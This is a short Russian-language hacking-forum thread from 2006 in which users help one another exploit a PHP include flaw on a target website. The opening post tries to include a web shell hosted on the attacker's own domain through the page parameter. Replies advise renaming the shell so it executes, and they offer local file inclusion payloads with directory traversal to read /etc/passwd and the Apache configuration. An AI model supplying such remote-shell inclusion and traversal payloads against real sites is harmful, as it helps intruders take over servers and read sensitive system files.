Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   инклуд (https://forum.antichat.xyz/showthread.php?t=15835)

Foblas 13.03.2006 06:36

инклуд
 
вот чтоу меня получилось:
запрос допустим такой- http://www.target.com/index1.php?pag....com/shell.txt

в браузере вижу - Warning: Failed opening './http://mypage.org/shell.txt' for inclusion (include_path='.:/usr/share/pear:/home/httpd/phplib') in /home/target/public_html/index1.php on line 63

./ - возможно ли как-то обойти, чтобы заинклудить файл/скрипт/что_нибудь_ещё?

Не гнобите сильно, если это проскакивает тут в стотысячный раз )

ArdeOS 13.03.2006 18:08

шелл нужно заливать на сайт с расширением php (!) А не с тхт - он выполнятся должен, а серевер на котором возможно есть инклуд, воспринимает его как обычный текстовик.
И еще на конце не нужно писать расширение пхп - http://mypage.com/shell если не катит то можно попробыва добавить его - в разных системах по разному ;)

Trinux 14.03.2006 18:25

Нет, ./ не обойти. В твоем случае можно выполнять лишь локальный инклуд

limpompo 14.03.2006 18:38

попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd

Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf

Trinux 14.03.2006 19:21

Цитата:

Сообщение от limpompo
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd

Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf

опять же непонятно число уровней до корневой директории с корня веб-сервака. т.е. количество "../" менять постепенно вверх.
[offtop]
ну почему у меня ник темно-зеленый, а у лимпопо - светло-зеленый?
[/offtop]

tclover 14.03.2006 19:23

Цитата:

[offtop]
ну почему у меня ник темно-зеленый, а у лимпопо - светло-зеленый?
[/offtop]
Ночной дозор. Всем выйти из сумрака! :)

KEZ 14.03.2006 19:23

Цитата:

попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd
никогда не понимал смысл вот этого
наверное статьи аля 80х, где цель всегда passwd, оставили свой след...

Foblas 14.03.2006 23:52

Цитата:

Сообщение от limpompo
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd

Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf


Пробовал впервую очередь, всё равно добавляет это злобное ./ (

m0nzt3r 14.03.2006 23:56

[offtop]
Trinux он же и в МОА ив АМА
[/offtop]


Время: 03:54